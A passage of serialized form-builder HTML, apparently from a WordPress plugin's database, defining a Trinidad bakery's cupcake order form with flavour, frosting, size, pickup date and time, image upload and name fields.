($15.00)</label><input type="hidden" id="7_elementlabel_form_id_temp3" name="7_elementform_id_temp3_label" value="Guinness ($15.00)"></td></tr><tr id="7_element_tr4"><td valign="top" id="7_td_little4" idi="4"><input type="checkbox" id="7_elementform_id_temp4" name="7_elementform_id_temp4" value="12" onclick="set_checked(''7'',''4'',''form_id_temp'')"><label id="7_label_element4" class="ch_rad_label" for="7_elementform_id_temp4">Coconut ($12.00)</label><input type="hidden" id="7_elementlabel_form_id_temp4" name="7_elementform_id_temp4_label" value="Coconut ($12.00)"></td></tr><tr id="7_element_tr5"><td valign="top" id="7_td_little5" idi="5"><input type="checkbox" id="7_elementform_id_temp5" name="7_elementform_id_temp5" value="10" onclick="set_checked(''7'',''5'',''form_id_temp'')"><label id="7_label_element5" class="ch_rad_label" for="7_elementform_id_temp5">Lemon ($10.00)</label><input type="hidden" id="7_elementlabel_form_id_temp5" name="7_elementform_id_temp5_label" value="Lemon ($10.00)"></td></tr><tr id="7_element_tr6"><td valign="top" id="7_td_little6" idi="6"><input type="checkbox" id="7_elementform_id_temp6" name="7_elementform_id_temp6" value="120" onclick="set_checked(''7'',''6'',''form_id_temp'')"><label id="7_label_element6" class="ch_rad_label" for="7_elementform_id_temp6">Chocolate Mint ($12.00)</label><input type="hidden" id="7_elementlabel_form_id_temp6" name="7_elementform_id_temp6_label" value="Chocolate Mint ($12.00)"></td></tr></tbody></table><div id="7_divform_id_temp"><span id="7_element_quantity_spanform_id_temp" style="margin-right: 15px;"><label class="mini_label" id="7_element_quantity_label_form_id_temp" style="margin-right: 5px;"><!--repstart-->Quantity<!--repend--></label><input type="text" value="1" id="7_element_quantityform_id_temp" name="7_element_quantityform_id_temp" onkeypress="return check_isnum(event)" onchange="change_value(''7_element_quantityform_id_temp'', this.value)" style="width: 30px; margin: 2px 0px;"></span><span id="7_property_0" style="margin-right: 15px;"><label class="mini_label" id="7_property_label_form_id_temp0" style="margin-right: 5px;">Cupcake Size</label><select id="7_propertyform_id_temp0" name="7_propertyform_id_temp0" type="null" style="width: auto; margin: 2px 0px;"><option id="7_0_option0" value="Regular(yield - 12 cupcakes)">Regular(yield - 12 cupcakes)</option><option id="7_0_option1" value="Small (yield - 24 cupcakes)">Small (yield - 24 cupcakes)</option><option id="7_0_option2" value="Mini (yield - 48 cupcakes)">Mini (yield - 48 cupcakes)</option></select></span></div></td><td id="X_7" valign="middle" align="right" class="element_toolbar"><img src="{$plugin_path}/images/delete_el.png" title="Remove the field" onclick="remove_row(&quot;7&quot;)" onmouseover="chnage_icons_src(this,&quot;delete_el&quot;)" onmouseout="chnage_icons_src(this,&quot;delete_el&quot;)" style="cursor: pointer; margin: 2px;"></td><td id="left_7" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/left.png" title="Move the field to the left" onclick="left_row(&quot;7&quot;)" onmouseover="chnage_icons_src(this,&quot;left&quot;)" onmouseout="chnage_icons_src(this,&quot;left&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="up_7" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/up.png" title="Move the field up" onclick="up_row(&quot;7&quot;)" onmouseover="chnage_icons_src(this,&quot;up&quot;)" onmouseout="chnage_icons_src(this,&quot;up&quot;)" style="cursor: pointer;"></td><td id="down_7" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/down.png" title="Move the field down" onclick="down_row(&quot;7&quot;)" onmouseover="chnage_icons_src(this,&quot;down&quot;)" onmouseout="chnage_icons_src(this,&quot;down&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="right_7" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/right.png" title="Move the field to the right" onclick="right_row(&quot;7&quot;)" onmouseover="chnage_icons_src(this,&quot;right&quot;)" onmouseout="chnage_icons_src(this,&quot;right&quot;)" style="cursor: pointer;"></td><td id="edit_7" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/edit.png" title="Edit the field" onclick="edit(&quot;7&quot;)" onmouseover="chnage_icons_src(this,&quot;edit&quot;)" onmouseout="chnage_icons_src(this,&quot;edit&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="dublicate_7" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/dublicate.png" title="Dublicate the field" onclick="dublicate(&quot;7&quot;)" onmouseover="chnage_icons_src(this,&quot;dublicate&quot;)" onmouseout="chnage_icons_src(this,&quot;dublicate&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="dublicate_7" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/page_down.png" title="Move the field to the lower page" onclick="page_down(&quot;7&quot;)" onmouseover="chnage_icons_src(this,&quot;page_down&quot;)" onmouseout="chnage_icons_src(this,&quot;page_down&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="page_up_7" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/page_up.png" title="Move the field to the upper page" onclick="page_up(&quot;7&quot;)" onmouseover="chnage_icons_src(this,&quot;page_up&quot;)" onmouseout="chnage_icons_src(this,&quot;page_up&quot;)" style="margin: 2px; cursor: pointer;"></td></tr><tr id="8" type="type_paypal_radio"><td valign="top" align="left" id="8_label_sectionform_id_temp" class=""><span id="8_element_labelform_id_temp" class="label">Choose your butter cream frosting:</span><span id="8_required_elementform_id_temp" class="required"></span></td><td valign="top" align="left" id="8_element_sectionform_id_temp" class=" toolbar_padding"><input type="hidden" value="type_paypal_radio" name="8_typeform_id_temp" id="8_typeform_id_temp"><input type="hidden" value="no" name="8_requiredform_id_temp" id="8_requiredform_id_temp"><input type="hidden" value="no" name="8_randomizeform_id_temp" id="8_randomizeform_id_temp"><input type="hidden" value="no" name="8_allow_otherform_id_temp" id="8_allow_otherform_id_temp"><table><tbody id="8_table_little"><tr id="8_element_tr0"><td valign="top" id="8_td_little0" idi="0"><input type="radio" id="8_elementform_id_temp0" name="8_elementform_id_temp" value="0" onclick="set_default(''8'',''0'',''form_id_temp'')"><label id="8_label_element0" class="ch_rad_label" for="8_elementform_id_temp0">Vanilla</label><input type="hidden" id="8_elementlabel_form_id_temp0" name="8_elementform_id_temp0_label" value="Vanilla"></td></tr><tr id="8_element_tr1"><td valign="top" id="8_td_little1" idi="1"><input type="radio" id="8_elementform_id_temp1" name="8_elementform_id_temp" value="0" onclick="set_default(''8'',''1'',''form_id_temp'')"><label id="8_label_element1" class="ch_rad_label" for="8_elementform_id_temp1">Chocolate</label><input type="hidden" id="8_elementlabel_form_id_temp1" name="8_elementform_id_temp1_label" value="Chocolate"></td></tr><tr id="8_element_tr2"><td valign="top" id="8_td_little2" idi="2"><input type="radio" id="8_elementform_id_temp2" name="8_elementform_id_temp" value="3" onclick="set_default(''8'',''2'',''form_id_temp'')"><label id="8_label_element2" class="ch_rad_label" for="8_elementform_id_temp2">Cream Cheese - add $3.00</label><input type="hidden" id="8_elementlabel_form_id_temp2" name="8_elementform_id_temp2_label" value="Cream Cheese - add $3.00"></td></tr><tr id="8_element_tr3"><td valign="top" id="8_td_little3" idi="3"><input type="radio" id="8_elementform_id_temp3" name="8_elementform_id_temp" value="0" onclick="set_default(''8'',''3'',''form_id_temp'')"><label id="8_label_element3" class="ch_rad_label" for="8_elementform_id_temp3">Salted Caramel</label><input type="hidden" id="8_elementlabel_form_id_temp3" name="8_elementform_id_temp3_label" value="Salted Caramel"></td></tr><tr id="8_element_tr4"><td valign="top" id="8_td_little4" idi="4"><input type="radio" id="8_elementform_id_temp4" name="8_elementform_id_temp" value="0" onclick="set_default(''8'',''4'',''form_id_temp'')"><label id="8_label_element4" class="ch_rad_label" for="8_elementform_id_temp4">Guinness</label><input type="hidden" id="8_elementlabel_form_id_temp4" name="8_elementform_id_temp4_label" value="Guinness"></td></tr><tr id="8_element_tr5"><td valign="top" id="8_td_little5" idi="5"><input type="radio" id="8_elementform_id_temp5" name="8_elementform_id_temp" value="0" onclick="set_default(''8'',''5'',''form_id_temp'')"><label id="8_label_element5" class="ch_rad_label" for="8_elementform_id_temp5">Almond</label><input type="hidden" id="8_elementlabel_form_id_temp5" name="8_elementform_id_temp5_label" value="Almond"></td></tr><tr id="8_element_tr6"><td valign="top" id="8_td_little6" idi="6"><input type="radio" id="8_elementform_id_temp6" name="8_elementform_id_temp" value="0" onclick="set_default(''8'',''6'',''form_id_temp'')"><label id="8_label_element6" class="ch_rad_label" for="8_elementform_id_temp6">Coconut</label><input type="hidden" id="8_elementlabel_form_id_temp6" name="8_elementform_id_temp6_label" value="Coconut"></td></tr></tbody></table><div id="8_divform_id_temp"></div></td><td id="X_8" valign="middle" align="right" class="element_toolbar"><img src="{$plugin_path}/images/delete_el.png" title="Remove the field" onclick="remove_row(&quot;8&quot;)" onmouseover="chnage_icons_src(this,&quot;delete_el&quot;)" onmouseout="chnage_icons_src(this,&quot;delete_el&quot;)" style="cursor: pointer; margin: 2px;"></td><td id="left_8" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/left.png" title="Move the field to the left" onclick="left_row(&quot;8&quot;)" onmouseover="chnage_icons_src(this,&quot;left&quot;)" onmouseout="chnage_icons_src(this,&quot;left&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="up_8" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/up.png" title="Move the field up" onclick="up_row(&quot;8&quot;)" onmouseover="chnage_icons_src(this,&quot;up&quot;)" onmouseout="chnage_icons_src(this,&quot;up&quot;)" style="cursor: pointer;"></td><td id="down_8" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/down.png" title="Move the field down" onclick="down_row(&quot;8&quot;)" onmouseover="chnage_icons_src(this,&quot;down&quot;)" onmouseout="chnage_icons_src(this,&quot;down&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="right_8" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/right.png" title="Move the field to the right" onclick="right_row(&quot;8&quot;)" onmouseover="chnage_icons_src(this,&quot;right&quot;)" onmouseout="chnage_icons_src(this,&quot;right&quot;)" style="cursor: pointer;"></td><td id="edit_8" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/edit.png" title="Edit the field" onclick="edit(&quot;8&quot;)" onmouseover="chnage_icons_src(this,&quot;edit&quot;)" onmouseout="chnage_icons_src(this,&quot;edit&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="dublicate_8" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/dublicate.png" title="Dublicate the field" onclick="dublicate(&quot;8&quot;)" onmouseover="chnage_icons_src(this,&quot;dublicate&quot;)" onmouseout="chnage_icons_src(this,&quot;dublicate&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="dublicate_8" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/page_down.png" title="Move the field to the lower page" onclick="page_down(&quot;8&quot;)" onmouseover="chnage_icons_src(this,&quot;page_down&quot;)" onmouseout="chnage_icons_src(this,&quot;page_down&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="page_up_8" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/page_up.png" title="Move the field to the upper page" onclick="page_up(&quot;8&quot;)" onmouseover="chnage_icons_src(this,&quot;page_up&quot;)" onmouseout="chnage_icons_src(this,&quot;page_up&quot;)" style="margin: 2px; cursor: pointer;"></td></tr><tr id="9" type="type_textarea"><td valign="top" align="left" id="9_label_sectionform_id_temp" class=""><span id="9_element_labelform_id_temp" class="label">Details (if any):</span><span id="9_required_elementform_id_temp" class="required"></span></td><td valign="top" align="left" id="9_element_sectionform_id_temp" class=" toolbar_padding"><input type="hidden" value="type_textarea" name="9_typeform_id_temp" id="9_typeform_id_temp"><input type="hidden" value="no" name="9_requiredform_id_temp" id="9_requiredform_id_temp"><input type="hidden" value="no" name="9_uniqueform_id_temp" id="9_uniqueform_id_temp"><textarea class="input_deactive" id="9_elementform_id_temp" name="9_elementform_id_temp" title="for example: pink frosting with silver pearls" value="for example: pink frosting with silver pearls" onfocus="delete_value(''9_elementform_id_temp'')" onblur="return_value(''9_elementform_id_temp'')" onchange="change_value(''9_elementform_id_temp'')" style="width: 200px; height: 100px;">for example: pink frosting with silver pearls</textarea></td><td id="X_9" valign="middle" align="right" class="element_toolbar"><img src="{$plugin_path}/images/delete_el.png" title="Remove the field" onclick="remove_row(&quot;9&quot;)" onmouseover="chnage_icons_src(this,&quot;delete_el&quot;)" onmouseout="chnage_icons_src(this,&quot;delete_el&quot;)" style="cursor: pointer; margin: 2px;"></td><td id="left_9" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/left.png" title="Move the field to the left" onclick="left_row(&quot;9&quot;)" onmouseover="chnage_icons_src(this,&quot;left&quot;)" onmouseout="chnage_icons_src(this,&quot;left&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="up_9" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/up.png" title="Move the field up" onclick="up_row(&quot;9&quot;)" onmouseover="chnage_icons_src(this,&quot;up&quot;)" onmouseout="chnage_icons_src(this,&quot;up&quot;)" style="cursor: pointer;"></td><td id="down_9" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/down.png" title="Move the field down" onclick="down_row(&quot;9&quot;)" onmouseover="chnage_icons_src(this,&quot;down&quot;)" onmouseout="chnage_icons_src(this,&quot;down&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="right_9" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/right.png" title="Move the field to the right" onclick="right_row(&quot;9&quot;)" onmouseover="chnage_icons_src(this,&quot;right&quot;)" onmouseout="chnage_icons_src(this,&quot;right&quot;)" style="cursor: pointer;"></td><td id="edit_9" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/edit.png" title="Edit the field" onclick="edit(&quot;9&quot;)" onmouseover="chnage_icons_src(this,&quot;edit&quot;)" onmouseout="chnage_icons_src(this,&quot;edit&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="dublicate_9" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/dublicate.png" title="Dublicate the field" onclick="dublicate(&quot;9&quot;)" onmouseover="chnage_icons_src(this,&quot;dublicate&quot;)" onmouseout="chnage_icons_src(this,&quot;dublicate&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="dublicate_9" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/page_down.png" title="Move the field to the lower page" onclick="page_down(&quot;9&quot;)" onmouseover="chnage_icons_src(this,&quot;page_down&quot;)" onmouseout="chnage_icons_src(this,&quot;page_down&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="page_up_9" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/page_up.png" title="Move the field to the upper page" onclick="page_up(&quot;9&quot;)" onmouseover="chnage_icons_src(this,&quot;page_up&quot;)" onmouseout="chnage_icons_src(this,&quot;page_up&quot;)" style="margin: 2px; cursor: pointer;"></td></tr><tr id="10" type="type_file_upload"><td colspan="2" id="10_label_and_element_sectionform_id_temp" class="toolbar_padding"><table id="10_elemet_tableform_id_temp"><tbody><tr><td valign="middle" align="left" id="10_label_sectionform_id_temp" class=""><span id="10_element_labelform_id_temp" class="label">Upload an image of cupcakes you like so that I can have an idea of what you want. </span><span id="10_required_elementform_id_temp" class="required"></span></td></tr><tr><td valign="top" align="left" id="10_element_sectionform_id_temp" class=""><input type="hidden" value="type_file_upload" name="10_typeform_id_temp" id="10_typeform_id_temp"><input type="hidden" value="no" name="10_requiredform_id_temp" id="10_requiredform_id_temp"><input type="hidden" value="***max_sizeskizb10***2000***max_sizeverj10***" id="10_max_size" name="10_max_size"><input type="hidden" value="***destinationskizb10***{$plugin_path}/uploads***destinationverj10***" id="10_destination" name="10_destination"><input type="hidden" value="***extensionskizb10***jpg, jpeg, png, gif***extensionverj10***" id="10_extension" name="10_extension"><input type="file" class="file_upload" id="10_elementform_id_temp" name="10_fileform_id_temp"></td></tr></tbody></table></td><td id="X_10" valign="middle" align="right" class="element_toolbar"><img src="{$plugin_path}/images/delete_el.png" title="Remove the field" onclick="remove_row(&quot;10&quot;)" onmouseover="chnage_icons_src(this,&quot;delete_el&quot;)" onmouseout="chnage_icons_src(this,&quot;delete_el&quot;)" style="cursor: pointer; margin: 2px;"></td><td id="left_10" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/left.png" title="Move the field to the left" onclick="left_row(&quot;10&quot;)" onmouseover="chnage_icons_src(this,&quot;left&quot;)" onmouseout="chnage_icons_src(this,&quot;left&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="up_10" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/up.png" title="Move the field up" onclick="up_row(&quot;10&quot;)" onmouseover="chnage_icons_src(this,&quot;up&quot;)" onmouseout="chnage_icons_src(this,&quot;up&quot;)" style="cursor: pointer;"></td><td id="down_10" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/down.png" title="Move the field down" onclick="down_row(&quot;10&quot;)" onmouseover="chnage_icons_src(this,&quot;down&quot;)" onmouseout="chnage_icons_src(this,&quot;down&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="right_10" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/right.png" title="Move the field to the right" onclick="right_row(&quot;10&quot;)" onmouseover="chnage_icons_src(this,&quot;right&quot;)" onmouseout="chnage_icons_src(this,&quot;right&quot;)" style="cursor: pointer;"></td><td id="edit_10" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/edit.png" title="Edit the field" onclick="edit(&quot;10&quot;)" onmouseover="chnage_icons_src(this,&quot;edit&quot;)" onmouseout="chnage_icons_src(this,&quot;edit&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="dublicate_10" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/dublicate.png" title="Dublicate the field" onclick="dublicate(&quot;10&quot;)" onmouseover="chnage_icons_src(this,&quot;dublicate&quot;)" onmouseout="chnage_icons_src(this,&quot;dublicate&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="dublicate_10" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/page_down.png" title="Move the field to the lower page" onclick="page_down(&quot;10&quot;)" onmouseover="chnage_icons_src(this,&quot;page_down&quot;)" onmouseout="chnage_icons_src(this,&quot;page_down&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="page_up_10" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/page_up.png" title="Move the field to the upper page" onclick="page_up(&quot;10&quot;)" onmouseover="chnage_icons_src(this,&quot;page_up&quot;)" onmouseout="chnage_icons_src(this,&quot;page_up&quot;)" style="margin: 2px; cursor: pointer;"></td></tr></tbody></table></td></tr><tr id="11" class="wdform_tr_section_break" type="type_section_break"><td id="11_element_sectionform_id_temp" align="left" valign="top" colspan="100" class="toolbar_padding"><p style="color: #212121; font-family: Helvetica; font-size: 13px; line-height: 18px;" data-mce-style="color: #212121; font-family: Helvetica; font-size: 13px; line-height: 18px;"><strong><span style="font-family: helvetica; font-size: small; color: #ff00ff;" data-mce-style="font-family: helvetica; font-size: small; color: #ff00ff;"><em>Your order total and order number will be communicated via email. Orders outside of Trinidad will be cancelled.&nbsp;</em></span></strong></p><p style="color: #212121; font-family: Helvetica; font-size: 13px; line-height: 18px;" data-mce-style="color: #212121; font-family: Helvetica; font-size: 13px; line-height: 18px;"><span style="font-family: helvetica; color: #000000; font-size: small;" data-mce-style="font-family: helvetica; color: #000000; font-size: small;"><strong>Themed orders will incur an additional cost...</strong></span></p></td><td id="X_11" valign="middle" align="right" class="element_toolbar"><img src="{$plugin_path}/images/delete_el.png" title="Remove the field" onclick="remove_section_break(&quot;11&quot;)" onmouseover="chnage_icons_src(this,&quot;delete_el&quot;)" onmouseout="chnage_icons_src(this,&quot;delete_el&quot;)" style="cursor: pointer; margin: 2px;"></td><td id="edit_11" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/edit.png" title="Edit the field" onclick="edit(&quot;11&quot;)" onmouseover="chnage_icons_src(this,&quot;edit&quot;)" onmouseout="chnage_icons_src(this,&quot;edit&quot;)" style="margin: 2px; cursor: pointer;"><span id="11_element_labelform_id_temp" style="display: none;">custom_11</span></td><td id="dublicate_11" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/dublicate.png" title="Dublicate the field" onclick="dublicate(&quot;11&quot;)" onmouseover="chnage_icons_src(this,&quot;dublicate&quot;)" onmouseout="chnage_icons_src(this,&quot;dublicate&quot;)" style="margin: 2px; cursor: pointer;"></td></tr><tr class="wdform_tr1"><td class="wdform_td1"><table class="wdform_table2"><tbody class="wdform_tbody2"><tr id="12" type="type_submit_reset"><td colspan="2" class="toolbar_padding" id="12_label_and_element_sectionform_id_temp"><table id="12_elemet_tableform_id_temp"><tbody><tr><td valign="middle" align="left" id="12_label_sectionform_id_temp" class="" style="display: none;"><span id="12_element_labelform_id_temp" style="display: none;">type_submit_reset_12</span></td><td valign="middle" align="left" id="12_element_sectionform_id_temp" class=""><input type="hidden" value="type_submit_reset" name="12_typeform_id_temp" id="12_typeform_id_temp"><button type="button" class="button_submit" id="12_element_submitform_id_temp" value="Submit" onclick="check_required(''submit'', ''form_id_temp'');">Submit</button><button type="button" class="button_reset" id="12_element_resetform_id_temp" value="Reset" onclick="check_required(''reset'');" style="display: none;">Reset</button></td></tr></tbody></table></td><td id="X_12" valign="middle" align="right" class="element_toolbar"><img src="{$plugin_path}/images/delete_el.png" title="Remove the field" onclick="remove_row(&quot;12&quot;)" onmouseover="chnage_icons_src(this,&quot;delete_el&quot;)" onmouseout="chnage_icons_src(this,&quot;delete_el&quot;)" style="cursor: pointer; margin: 2px;"></td><td id="left_12" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/left.png" title="Move the field to the left" onclick="left_row(&quot;12&quot;)" onmouseover="chnage_icons_src(this,&quot;left&quot;)" onmouseout="chnage_icons_src(this,&quot;left&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="up_12" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/up.png" title="Move the field up" onclick="up_row(&quot;12&quot;)" onmouseover="chnage_icons_src(this,&quot;up&quot;)" onmouseout="chnage_icons_src(this,&quot;up&quot;)" style="cursor: pointer;"></td><td id="down_12" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/down.png" title="Move the field down" onclick="down_row(&quot;12&quot;)" onmouseover="chnage_icons_src(this,&quot;down&quot;)" onmouseout="chnage_icons_src(this,&quot;down&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="right_12" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/right.png" title="Move the field to the right" onclick="right_row(&quot;12&quot;)" onmouseover="chnage_icons_src(this,&quot;right&quot;)" onmouseout="chnage_icons_src(this,&quot;right&quot;)" style="cursor: pointer;"></td><td id="edit_12" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/edit.png" title="Edit the field" onclick="edit(&quot;12&quot;)" onmouseover="chnage_icons_src(this,&quot;edit&quot;)" onmouseout="chnage_icons_src(this,&quot;edit&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="dublicate_12" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/dublicate.png" title="Dublicate the field" onclick="dublicate(&quot;12&quot;)" onmouseover="chnage_icons_src(this,&quot;dublicate&quot;)" onmouseout="chnage_icons_src(this,&quot;dublicate&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="dublicate_12" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/page_down.png" title="Move the field to the lower page" onclick="page_down(&quot;12&quot;)" onmouseover="chnage_icons_src(this,&quot;page_down&quot;)" onmouseout="chnage_icons_src(this,&quot;page_down&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="page_up_12" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/page_up.png" title="Move the field to the upper page" onclick="page_up(&quot;12&quot;)" onmouseover="chnage_icons_src(this,&quot;page_up&quot;)" onmouseout="chnage_icons_src(this,&quot;page_up&quot;)" style="margin: 2px; cursor: pointer;"></td></tr></tbody></table></td></tr><tr class="wdform_footer"><td colspan="100" valign="top"><table width="100%" style="padding-right:170px"><tbody><tr id="form_id_temppage_nav1"></tr></tbody></table></td></tr></tbody><tbody id="form_id_tempform_view_img1" style="float:right ;"><tr><td width="0%"></td><td align="right"><img src="{$plugin_path}/images/minus.png" title="Show or hide the page" class="page_toolbar" id="show_page_img_2" onclick="show_or_hide(&quot;2&quot;)" onmouseover="chnage_icons_src(this,&quot;minus&quot;)" onmouseout="chnage_icons_src(this,&quot;minus&quot;)"></td><td><img src="{$plugin_path}/images/page_delete.png" title="Delete the page" class="page_toolbar" onclick="remove_page(&quot;2&quot;)" onmouseover="chnage_icons_src(this,&quot;page_delete&quot;)" onmouseout="chnage_icons_src(this,&quot;page_delete&quot;)"></td><td><img src="{$plugin_path}/images/page_delete_all.png" title="Delete the page with fields" class="page_toolbar" onclick="remove_page_all(&quot;2&quot;)" onmouseover="chnage_icons_src(this,&quot;page_delete_all&quot;)" onmouseout="chnage_icons_src(this,&quot;page_delete_all&quot;)"></td><td><img src="{$plugin_path}/images/page_edit.png" title="Edit the page" class="page_toolbar" onclick="edit_page_break(&quot;2&quot;)" onmouseover="chnage_icons_src(this,&quot;page_edit&quot;)" onmouseout="chnage_icons_src(this,&quot;page_edit&quot;)"></td></tr></tbody></table>', '<table cellpadding="4" cellspacing="0" class="wdform_table1" style="border-top:0px solid black;"><tbody id="form_id_tempform_view1" class="wdform_tbody1" page_title="Untitled page" next_title="Next" next_type="button" next_class="wdform_page_button" next_checkable="false" previous_title="Previous" previous_type="button" previous_class="wdform_page_button" previous_checkable="false"><tr class="wdform_tr1"><td class="wdform_td1"><table class="wdform_table2"><tbody class="wdform_tbody2"><tr id="1" type="type_date"><td valign="middle" align="left" id="1_label_sectionform_id_temp" class=""><span id="1_element_labelform_id_temp" class="label">Choose your date for pick up:</span><span id="1_required_elementform_id_temp" class="required"></span></td><td valign="middle" align="left" id="1_element_sectionform_id_temp" class=" toolbar_padding"><input type="hidden" value="type_date" name="1_typeform_id_temp" id="1_typeform_id_temp"><input type="hidden" value="no" name="1_requiredform_id_temp" id="1_requiredform_id_temp"><input type="text" value="" class="wdform_date" id="1_elementform_id_temp" name="1_elementform_id_temp" maxlength="10" size="10" onchange="change_value(''1_elementform_id_temp'')"><input id="1_buttonform_id_temp" class="button" type="reset" value="..." format="%Y-%m-%d" onclick="return showCalendar(''1_elementform_id_temp'' ,''%Y-%m-%d'')"></td></tr><tr id="16" type="type_time"><td valign="top" align="left" id="16_label_sectionform_id_temp" class=""><span id="16_element_labelform_id_temp" class="label">Time:</span><span id="16_required_elementform_id_temp" class="required"></span></td><td valign="middle" align="left" id="16_element_sectionform_id_temp" class=" toolbar_padding"><input type="hidden" value="type_time" name="16_typeform_id_temp" id="16_typeform_id_temp"><input type="hidden" value="no" name="16_requiredform_id_temp" id="16_requiredform_id_temp"><table id="16_table_time" cellpadding="0" cellspacing="0"><tbody><tr id="16_tr_time1"><td id="16_td_time_input1" style="width: 32px;"><input type="text" value="" class="time_box" id="16_hhform_id_temp" name="16_hhform_id_temp" onkeypress="return check_hour(event, ''16_hhform_id_temp'', ''23'')" onkeyup="change_hour(event, ''16_hhform_id_temp'',''23'')" onblur="add_0(''16_hhform_id_temp'')"></td><td align="center"><span class="wdform_colon" style="vertical-align: middle;">&nbsp;:&nbsp;</span></td><td id="16_td_time_input2" style="width: 32px;"><input type="text" value="" class="time_box" id="16_mmform_id_temp" name="16_mmform_id_temp" onkeypress="return check_minute(event, ''16_mmform_id_temp'')" onkeyup="change_minute(event, ''16_mmform_id_temp'')" onblur="add_0(''16_mmform_id_temp'')"></td><td align="center"><span class="wdform_colon" style="vertical-align: middle;">&nbsp;:&nbsp;</span></td><td id="16_td_time_input3" style="width: 32px;"><input type="text" value="" class="time_box" id="16_ssform_id_temp" name="16_ssform_id_temp" onkeypress="return check_second(event, ''16_ssform_id_temp'')" onkeyup="change_second(event, ''16_ssform_id_temp'')" onblur="add_0(''16_ssform_id_temp'')"></td></tr><tr id="16_tr_time2"><td id="16_td_time_label1"><label class="mini_label" id="16_mini_label_hh">HH</label></td><td></td><td id="16_td_time_label2"><label class="mini_label" id="16_mini_label_mm">MM</label></td><td></td><td id="16_td_time_label3"><label class="mini_label" id="16_mini_label_ss">SS</label></td></tr></tbody></table></td></tr><tr id="13" type="type_name"><td valign="top" align="left" id="13_label_sectionform_id_temp" class=""><span id="13_element_labelform_id_temp" class="label">Full Name:</span><span id="13_required_elementform_id_temp" class="required"> *</span></td><td valign="top" align="left" id="13_element_sectionform_id_temp" class=" toolbar_padding"><input type="hidden" value="type_name" name="13_typeform_id_temp" id="13_typeform_id_temp"><input type="hidden" value="yes" name="13_requiredform_id_temp" id="13_requiredform_id_temp"><input type="hidden" value="no" name="13_uniqueform_id_temp" id="13_uniqueform_id_temp"><table id="13_table_name" cellpadding="0" cellspacing="0"><tbody><tr id="13_tr_name1"><td id="13_td_name_input_first"><input type="text" class="input_deactive" id="13_element_firstform_id_temp" name="13_element_firstform_id_temp" value="" title="" onfocus="delete_value(&quot;13_element_firstform_id_temp&quot;)" onblur="return_value(&quot;13_element_firstform_id_temp&quot;)" onchange="change_value(''13_element_firstform_id_temp'')" style="margin-right: 10px; width: 100px;"></td><td id="13_td_name_input_last"><input type="text" class="input_deactive" id="13_element_lastform_id_temp" name="13_element_lastform_id_temp" value="" title="" onfocus="delete_value(&quot;13_element_lastform_id_temp&quot;)" onblur="return_value(&quot;13_element_lastform_id_temp&quot;)" onchange="change_value(''13_element_lastform_id_temp'')" style="margin-right: 10px; width: 100px;"></td></tr><tr id="13_tr_name2"><td id="13_td_name_label_first" align="left"><label class="mini_label" id="13_mini_label_first">First</label></td><td id="13_td_name_label_last" align="left"><label class="mini_label" id="13_mini_label_last">Last</label></td></tr></tbody></table></td></tr><tr id="5" type="type_submitter_mail"><td valign="middle" align="left" 